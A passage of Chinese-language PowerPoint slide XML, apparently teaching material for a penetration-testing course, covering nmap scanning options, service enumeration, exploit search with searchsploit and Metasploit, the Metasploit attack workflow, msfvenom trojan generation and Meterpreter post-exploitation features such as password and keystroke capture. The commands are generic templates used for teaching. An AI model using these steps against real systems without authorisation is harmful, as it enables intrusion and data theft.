              <a:t>--open：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>只显示开放端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--min-parallelism：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>探测报文的并发数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--version-all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>：尝试每个探测，保证对每个端口尝试每个探测报文，获取服务更具体的版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p-：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>表示扫描所有的端口（1-65535）</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606"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="1360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应用程序扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SMP</a:t>
            </a:r>
            <a:r>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:t>枚举</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:t>枚举</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr/>
          </a:p>
          <a:p>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051"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="1805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漏洞分析与发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>搜索漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>searchsploit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0"/>
              <a:t>搜索</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   //</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目录中可用的漏洞利用代码和攻击载荷</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>搜索某个特定的漏洞利用代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search exploit-name or search-term</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>搜索引擎搜索</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>网站搜索</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr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567"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="10556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nmap</a:t>
            </a:r>
            <a:r>
              <a:t>脚本引擎扫描漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Nmap脚本引擎（NSE）是Nmap最强大和最灵活的特性之一，它可以将Nmap转为漏洞扫描器使用。NSE有超过600个脚本，有非侵入式的，也有侵入式的，比如暴力破解，漏洞利用和拒绝服务攻击。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/scripts/ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>目录中可以看到这些脚本。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -script &lt;name&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>db_nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>中也可使用脚本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3945255" y="3108325"/>
            <a:ext cx="8246745" cy="3749675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="视频 5">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5CFDE98-4FBF-4667-8C1D-D5CF3C7FEFDE}"/>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275"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="12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漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;use exploit-name  //</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>激活某个漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;show options   //</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>查看参数设置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;set </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>参数值      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>设置参数值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;run or exploit   //</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>实施攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>验证攻击结果</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284"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="4828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后渗透阶段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msfnevom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>生成木马工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfnevom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指定载荷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本地监听地址 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本地监听端口 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件格式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输出文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shell的链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Meterpreter命令详解，https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://www.cnblogs.com/backlion/p/9484949.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="10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257800" y="2231783"/>
            <a:ext cx="6629399"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solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>精通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>某一种或者几种攻防技术，达到技术专家的级别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="图片 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="486307" y="1680436"/>
            <a:ext cx="5404973" cy="5139464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 64"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noSelect="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noChangeShapeType="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="screen"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5107616" y="27865564"/>
            <a:ext cx="1976768" cy="511028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610349" y="5105400"/>
            <a:ext cx="5257800"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solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基础技能；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全问题及解决方案，激发学生强烈兴趣</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277644" y="4062889"/>
            <a:ext cx="5590505"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solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>熟悉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统基本原理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>初级攻防技能；着眼于网络空间安全专业基础能力的训练，以及灵活运用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830408" y="3147336"/>
            <a:ext cx="6028216" cy="76200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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全面掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>各种攻防实战技术，具备解决网络攻防中的各类技术问题能力</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="直接连接符 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5107616" y="5519012"/>
            <a:ext cx="1170028" cy="195988"/>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724400" y="4461786"/>
            <a:ext cx="1189957" cy="186414"/>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238028" y="3506262"/>
            <a:ext cx="1206016" cy="219215"/>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3771900" y="2653441"/>
            <a:ext cx="1147362" cy="242160"/>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6357871" y="5105400"/>
            <a:ext cx="252478"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solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>学期</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形: 圆角 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6048243" y="4081884"/>
            <a:ext cx="252478"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solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>学期</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形: 圆角 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603903" y="3187307"/>
            <a:ext cx="252478"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solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>学期</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形: 圆角 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5066900" y="2231783"/>
